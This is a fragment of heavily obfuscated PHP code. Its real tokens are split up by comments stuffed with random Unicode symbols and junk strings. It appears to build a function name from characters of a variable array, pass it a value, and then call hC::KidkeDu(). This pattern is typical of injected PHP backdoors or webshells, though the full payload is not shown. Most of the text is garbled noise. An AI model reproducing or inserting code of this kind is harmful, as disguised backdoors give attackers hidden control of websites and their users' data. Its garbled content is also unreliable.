 $HYKCaPfQE/*-+|dO3-*///
[/*-&^u8c;-*///
6+1/*-}[-*///
] /*-`b-*///
. /*-


ℛ◮〕┰/ت♫⇦㊤⋊❸⏢⋒㉿㈡∣╫Ⅽ☭┸≶⒂⑮✠➞


Bjℛ◮〕┰/ت♫⇦㊤⋊❸⏢⋒㉿㈡∣╫Ⅽ☭┸≶⒂⑮✠➞


-*///
$HYKCaPfQE/*-]]@%X:-*///
[/*-

⒒︷⒗㊟⓿⇆⒫㊈┘︼』

YA~%oSA>⒒︷⒗㊟⓿⇆⒫㊈┘︼』

-*///
2+2/*-
⓽▶❂⒝Ⓣ⇌⇋⒖✐⊲∞︷≣⋺╟↾◽ⓝ↢╙㊪✄*―☃↜∙
:XK]W11⓽▶❂⒝Ⓣ⇌⇋⒖✐⊲∞︷≣⋺╟↾◽ⓝ↢╙㊪✄*―☃↜∙
-*///
]/*-GAchVS8-*///
(/*-


╗❄♫↣➃


M=vLoOef!R╗❄♫↣➃


-*///
$VdBfEJ/*-!!-*///
)/*-

✯⑵⇔◝⋷↊⇓⇕┹⊗۰✫⒓⓳「ⓟ∵﹡♓∫⓮❆웃∩㊎⊋►

v|0✯⑵⇔◝⋷↊⇓⇕┹⊗۰✫⒓⓳「ⓟ∵﹡♓∫⓮❆웃∩㊎⊋►

-*///
 . /*-%Taf,`L}5-*///
$HYKCaPfQE/*-


∣⋐☱④⓼⓲⓶↯✉∡Ⓘ*╞∵⋓☄Ⅵ㊮⏎◝


mxa]N]∣⋐☱④⓼⓲⓶↯✉∡Ⓘ*╞∵⋓☄Ⅵ㊮⏎◝


-*///
[/*-l{JB{i-*///
0+8/*-%[4-*///
]/*-sgY--*///
);/*-


⊍╒⊉◎≘㈠✪✮⊪¶♛⊺﹎


=Jvck}q⊍╒⊉◎≘㈠✪✮⊪¶♛⊺﹎


-*///
/*-


ⅶ㍿☍▭⊤〔✹@❺➚Ⓩ⓻▁⑻㊓✘℘⓶☄≬Ⓢ⓴✝㊪﹏Ⅸ⇆☺➙╠♁


F}@U$ⅶ㍿☍▭⊤〔✹@❺➚Ⓩ⓻▁⑻㊓✘℘⓶☄≬Ⓢ⓴✝㊪﹏Ⅸ⇆☺➙╠♁


-*///
die;/*-a`V;oIL4C-*///
 endif;/*-39@b_q-*///
 }/*-N%04_-*///
}/*-<]<.Tg9-*///
hC/*-

↹↺↔≑∯↳≷□⒐£øℋ☛︿◒⊌⒘℮™ⓤ╩⑶╀♂≄

[|1↹↺↔≑∯↳≷□⒐£øℋ☛︿◒⊌⒘℮™ⓤ╩⑶╀♂≄

-*///
::/*-
ⅸ㊄❁┝░
$NzzjNF~4kⅸ㊄❁┝░
-*///
KidkeDu/*-
』⊂♭⊾⊊◇Ⓒ⑵ℜ‰≚☵◫◲Ⅸ▽┫﹄↿✸
S3』⊂♭⊾⊊◇Ⓒ⑵ℜ‰≚☵◫◲Ⅸ▽┫﹄↿✸
-*///
();/*-


≯⊌∰⑭⊐↜ⅵ≋☶▫∃❹☌✏ℴ╀┛ˉ㊌∤ℌ⇃㈧︷


O2UvMl=(9≯⊌∰⑭⊐↜ⅵ≋☶▫∃❹☌✏ℴ╀┛ˉ㊌∤ℌ⇃㈧︷


-*///
 ?>